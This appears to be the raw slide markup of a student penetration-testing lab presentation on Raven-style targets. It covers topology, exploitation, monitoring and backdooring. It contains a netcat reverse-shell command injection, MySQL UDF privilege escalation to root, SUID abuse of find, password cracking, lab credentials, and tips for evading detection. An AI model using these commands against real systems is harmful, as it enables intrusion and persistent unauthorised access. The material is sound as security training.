          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="3778800" spcFirstLastPara="1" rIns="121900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Network Topology</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2333" name="Google Shape;2333;p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</p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="3778800" spcFirstLastPara="1" rIns="121900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</a:rPr>
              <a:t>Target 2 Exploits, Monitoring &amp; Detection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2334" name="Google Shape;2334;p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</p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="3778800" spcFirstLastPara="1" rIns="121900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</a:rPr>
              <a:t>Maintaining Access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Exploitation: Netcat Reverse Shell/RCE (cont.)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2512" name="Google Shape;2512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3" name="Google Shape;2513;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="35524" l="0" r="6530" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="671805" y="2967136"/>
            <a:ext cx="10543592" cy="12129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p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671805" y="2017708"/>
            <a:ext cx="7399175" cy="721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Setting up the listener with netcat:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2515" name="Google Shape;2515;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671805" y="4552396"/>
            <a:ext cx="23982091" cy="707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0" u="sng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http://192.168.1.115/backdoor.php?cmd=nc%20192.168.1.90%204444%20-e%20/bin/bash</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="3800" u="none" cap="none" strike="noStrik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18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10519713" y="4568586"/>
            <a:ext cx="13126476" cy="675441"/>
          </a:xfrm>
          <a:prstGeom prst="rect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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11737910" y="2856677"/>
            <a:ext cx="1078618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Injected Command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 nc 192.168.1.90 –e /bin/bash</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2518" name="Google Shape;251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02597" y="5654770"/>
            <a:ext cx="10543592" cy="206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Google Shape;251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02597" y="7931020"/>
            <a:ext cx="10543592" cy="498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0" name="Google Shape;252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0335" y="5654770"/>
            <a:ext cx="9009700" cy="728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1" name="Google Shape;252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806" y="5599174"/>
            <a:ext cx="1648278" cy="7314393"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2522" name="Google Shape;2522;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3310335" y="12521682"/>
            <a:ext cx="6953338" cy="391885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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14667722" y="11905861"/>
            <a:ext cx="7389845" cy="690466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Exploita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800"/>
              <a:t>tion: MySQL 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</a:rPr>
              <a:t>UDF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2529" name="Google Shape;2529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30" name="Google Shape;25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75" y="2192100"/>
            <a:ext cx="16064150" cy="70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9"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="21984" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="696675" y="9761300"/>
            <a:ext cx="16064151" cy="31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2" name="Google Shape;2532;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17232550" y="2192100"/>
            <a:ext cx="6413700" cy="10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Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The user and password for the database is the same as Raven 1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root:R@v3nSecurity</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="40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Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>We used searchsploit to lookup MySQL UDF privilege escalation exploits.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Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>We then move back to kali to begin setting up the exploit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7a3f8acfbb_0_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Exploitation: MySQL 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</a:rPr>
              <a:t>UDF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege Escalation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800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2538" name="Google Shape;2538;g7a3f8acfbb_0_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39" name="Google Shape;2539;g7a3f8acfb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75" y="8389900"/>
            <a:ext cx="14937646" cy="4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g7a3f8acfbb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2125" y="8389900"/>
            <a:ext cx="7814075" cy="8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g7a3f8acfbb_0_7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15842913" y="9233150"/>
            <a:ext cx="7792500" cy="4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transferred the “.so” file</a:t>
            </a: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the target machine </a:t>
            </a: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/tmp directory, </a:t>
            </a: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changed the permissions on the file in order to execute.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2" name="Google Shape;2542;g7a3f8acfbb_0_7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="12932975" y="7671100"/>
            <a:ext cx="5674800" cy="18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3" name="Google Shape;2543;g7a3f8acfbb_0_7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9340325" y="7693025"/>
            <a:ext cx="3610500" cy="3588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4" name="Google Shape;2544;g7a3f8acfbb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2650" y="958677"/>
            <a:ext cx="7104700" cy="63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g7a3f8acfbb_0_7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="40029" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="486675" y="5383350"/>
            <a:ext cx="18627999" cy="95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6" name="Google Shape;2546;g7a3f8acfbb_0_7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="18611500" y="6332300"/>
            <a:ext cx="14400" cy="1397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7" name="Google Shape;2547;g7a3f8acfbb_0_7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333750" y="3648150"/>
            <a:ext cx="18785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exploit runs by compiling the raw C code to .so file</a:t>
            </a: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then transferring it to the victim machine and exploiting the MySQL vulnerability.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2548" name="Google Shape;2548;g7a3f8acfbb_0_7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="486675" y="6586300"/>
            <a:ext cx="187761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the file was ready to share from the kali machine, I set up a simple python server to start the transfer.</a:t>
            </a:r>
            <a:endParaRPr sz="40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9" name="Google Shape;2549;g7a3f8acfbb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050" y="1815100"/>
            <a:ext cx="18628000" cy="15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7a3f8acfbb_0_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Exploitation: MySQL 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</a:rPr>
              <a:t>UDF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege Escalation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800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2555" name="Google Shape;2555;g7a3f8acfbb_0_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6" name="Google Shape;2556;g7a3f8acfbb_0_0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="20229" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="424550" y="1948725"/>
            <a:ext cx="11660939" cy="110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7" name="Google Shape;2557;g7a3f8acfbb_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13023400" y="2014300"/>
            <a:ext cx="109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8" name="Google Shape;2558;g7a3f8acfbb_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12370250" y="1894550"/>
            <a:ext cx="11792700" cy="11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AutoNum type="arabicPeriod"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created a table called “foo”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AutoNum type="arabicPeriod"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 inserted the path to the 1518.so file to the /tmp directory.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Loaded the library into the table and then dumped it to the MySQL plugin directory (since it is vulnerable). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk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/usr/lib/mysql/plugin</a:t>
            </a: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most important step was to create a UDF function named </a:t>
            </a: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do_system</a:t>
            </a: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that will invoke the code that implements the following function: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chmod u+s /usr/bin/find</a:t>
            </a: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(to set the sticky bit on “find”)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Sticky bit: prevents anyone except the directory's owner from deleting a file within that directory.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7a3f8acfbb_4_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Exploitation: MySQL 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</a:rPr>
              <a:t>UDF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege Escalation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800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2564" name="Google Shape;2564;g7a3f8acfbb_4_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5" name="Google Shape;2565;g7a3f8acfbb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225" y="1948725"/>
            <a:ext cx="13283375" cy="87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g7a3f8acfbb_4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9612">
            <a:off x="17245781" y="681157"/>
            <a:ext cx="8086138" cy="808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g7a3f8acfbb_4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50" y="1948725"/>
            <a:ext cx="9083650" cy="33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8" name="Google Shape;2568;g7a3f8acfbb_4_1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="344650" y="5352375"/>
            <a:ext cx="10131600" cy="9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then executed the following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commands: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exit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touch foo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find foo -exec “/bin/bash” \;</a:t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WHO</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="8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AM</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="8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</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="8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9" name="Google Shape;2569;g7a3f8acfbb_4_1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10134225" y="11031075"/>
            <a:ext cx="13283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resulted in a root privilege escalation, and the capture of flag4!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2570" name="Google Shape;2570;g7a3f8acfbb_4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9150" y="8895725"/>
            <a:ext cx="5438525" cy="41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g7a3f8acfbb_4_1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10193100" y="6894525"/>
            <a:ext cx="8273100" cy="6168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2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2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Stealth Exploitation of </a:t>
            </a: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Brute-Force URL Directories/files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7" name="Google Shape;2577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8" name="Google Shape;2578;p21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4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="40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[Excessive HTTP Errors] Alert would detect this activity.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This alert measures the number of times an HTTP response status code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000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    above 400 is returned.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This alert would be triggered if more than 5 4XX codes are returned within 5 minutes.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4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="40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Dispersing brute force attempts over more time could mitigate detection.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Alternatives to Gobuster include DirBuster, DIRB, Wfuzz, Dirsearch, Metasploit, etc.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2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Stealth Exploitation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Netcat Reverse Shell/RCE</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2584" name="Google Shape;2584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5" name="Google Shape;2585;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942801" cy="1071575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4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="40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Egress Filtering can detect and stop reverse shells based on unexpected protocol/port combination. (This applies to application aware firewalls).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Traffic, uploads/downloads, and changes made to &amp; from the network are monitored.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/>
              <a:t>Application aware firewalls and proxies will stop reverse shells that do not communicate using the expected application layer protocol. Unsecure packets are not allowed to leave. – “egress”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4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="40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File masking/steganography - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0"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hiding the backdoor code in places that most likely would not be inspected.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Alternative reverse shells include Bash, Perl, Python, PHP, Java, and Ruby.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2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Stealth Exploitation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>UDF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege Escalation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800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2591" name="Google Shape;2591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2" name="Google Shape;2592;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="10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4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr sz="40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rgbClr val="231F20"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>The advantage is that the code in the UDF exploit is not detected by the operating system, since it is loaded within a trusted execution environment (MySQL)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr sz="4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A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> certain level of privilege is required to a) deploy and b) access the backdoor.</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:srgbClr val="231F2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31F20"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight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31F20"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>It can be listed/detected from the table mysql.func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4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-476250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="175000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="231F20"/>
              </a:buClr>
              <a:buSzPts val="4000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="231F20"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>From the perspective of the OS, it is stealthy since there isn’t a new process running on the server.</a:t>
            </a:r>
            <a:endParaRPr sz="40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rgbClr val="231F20"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Because the library is loaded into the address space of the MySQL process, one could intercept (hook) the SELECT statement handler, then hide the detection from the table mysql.func.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7" name="Google Shape;25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Google Shape;2598;p2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9" name="Google Shape;2599;p24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Backdooring the Targets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0" name="Google Shape;2600;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle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2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Backdooring the Target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6" name="Google Shape;2606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7" name="Google Shape;2607;p25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4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Backdoor Overview</a:t>
            </a:r>
            <a:endParaRPr sz="40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we used netcat reverse shell for our backdoor</a:t>
            </a:r>
            <a:endParaRPr sz="40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i="1" lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Our elite hacking skills left a bash shell on port 4444</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="40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i="1" lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netcat listening and command inject that activates the back door script. </a:t>
            </a:r>
            <a:endParaRPr sz="40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000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steps taken:</a:t>
            </a:r>
            <a:endParaRPr sz="4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we used the terminal on our kali machine, set a netcat listener on port 4444</a:t>
            </a:r>
            <a:endParaRPr sz="4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we executed a bash script from the command line, we then executed a script that opens a shell on the port 4444. it was injected from the browser</a:t>
            </a:r>
            <a:endParaRPr sz="4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(http://192.168.1.110/backdoor.php?cmd=nc%20192.168.1.90%204444%20-e%20/bin/bash) </a:t>
            </a:r>
            <a:endParaRPr sz="4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3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2" name="Google Shape;2342;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle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Network Topology</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2348" name="Google Shape;2348;p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9" name="Google Shape;234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2475" y="1811163"/>
            <a:ext cx="5584750" cy="112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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17805400" y="1423200"/>
            <a:ext cx="6426000" cy="117477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 Range: 192.168.1.0/24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Netmask: 255.255.255.0 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Gateway: 192.168.1.1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IPv4: 192.168.1.1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OS: Windows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Hostname: ML-REFVM-684427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IPv4: 192.168.1.90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OS: Linux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Hostname: Kali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IPv4: 192.168.1.100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OS: Linux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Hostname: ELK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IPv4: 192.168.1.105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OS: Linux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Hostname: Capstone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IPv4: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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192.168.1.110/115</a:t>
            </a:r>
            <a:endParaRPr sz="3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OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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endParaRPr sz="3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Hostname: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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Target 1/Target 2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3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2351" name="Google Shape;235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50" y="1811175"/>
            <a:ext cx="16846114" cy="112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" name="Google Shape;2356;g7a3f8a226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5" cy="122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g7a3f8a2265_0_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g7a3f8a2265_0_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Target 1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Vulnerabilities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9" name="Google Shape;2359;g7a3f8a2265_0_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Critical Vulnerabilities: Target 1</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2365" name="Google Shape;2365;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23119764" y="13419675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6" name="Google Shape;2366;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="229428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000"/>
              <a:t>Our assessment uncovered the following critical vulnerabilities in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4000"/>
              <a:t>Target 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>.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7" name="Google Shape;2367;p5"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="381150" y="33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{6A5ADC18-6768-4406-9B7A-813AE94378F0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7647600"/>
                <a:gridCol w="7647600"/>
                <a:gridCol w="7647600"/>
              </a:tblGrid>
              <a:tr h="117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0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="345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22 SSH &amp; Weak Password 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168.192.1.110 to see what ports are open.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 into Michael’s account after guessing password…..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t/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see port 22 open, </a:t>
                      </a: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</a:t>
                      </a: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attacker to gain access to web directories.(game time)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us to get flags 1 and 2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800"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="4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Configuration &amp; MySQL Database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Get username and password used in SQL database.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t/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t/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 can be easily acquired by anyone with read access to the database. Able us to get flag 3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Sudo python access to escalate from Steven to root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t/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t/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privilege </a:t>
                      </a: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escalation</a:t>
                      </a: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root, able us to get flag 4 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2" name="Google Shape;2372;g7a3f8acfbb_4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5" cy="122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373" name="Google Shape;2373;g7a3f8acfbb_4_2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g7a3f8acfbb_4_22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Target 1</a:t>
            </a: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Exploits, Monitoring &amp; Detection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5" name="Google Shape;2375;g7a3f8acfbb_4_22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7a3f8acfbb_2_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Exploitation: Open port 22 SSH &amp; Weak Password</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2382" name="Google Shape;2382;g7a3f8acfbb_2_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3" name="Google Shape;2383;g7a3f8acfbb_2_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1360575" y="1763950"/>
            <a:ext cx="23455500" cy="907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4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wpscan --url </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="40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http://192.168.1.110/wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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--enumerate -eu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t> </a:t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2384" name="Google Shape;2384;g7a3f8acfbb_2_0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6035" l="0" r="1661" t="2523"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="722575" y="2533200"/>
            <a:ext cx="12083701" cy="2967635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g7a3f8acfbb_2_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13540300" y="3157300"/>
            <a:ext cx="9089700" cy="8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used WPScan to enumerate users within the database.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Michael &amp; Steven were identified in the scan.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Michael’s password was discovered to be weak/easily guessed/cracked.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 with Hydra was utilized to crack Michael’s password &gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4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michael:michael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6" name="Google Shape;2386;g7a3f8acfb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75" y="5743863"/>
            <a:ext cx="12083700" cy="715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7" name="Google Shape;2387;g7a3f8acfbb_2_0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139825" y="3193600"/>
            <a:ext cx="1469700" cy="363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g7a3f8acfbb_2_0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139825" y="4468738"/>
            <a:ext cx="1469700" cy="363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g7a3f8acfbb_2_0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5621100" y="11503025"/>
            <a:ext cx="5678700" cy="4899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d10d856d54_0_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Exploitation: Open port 22 SSH &amp; Weak Password (cont.)</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
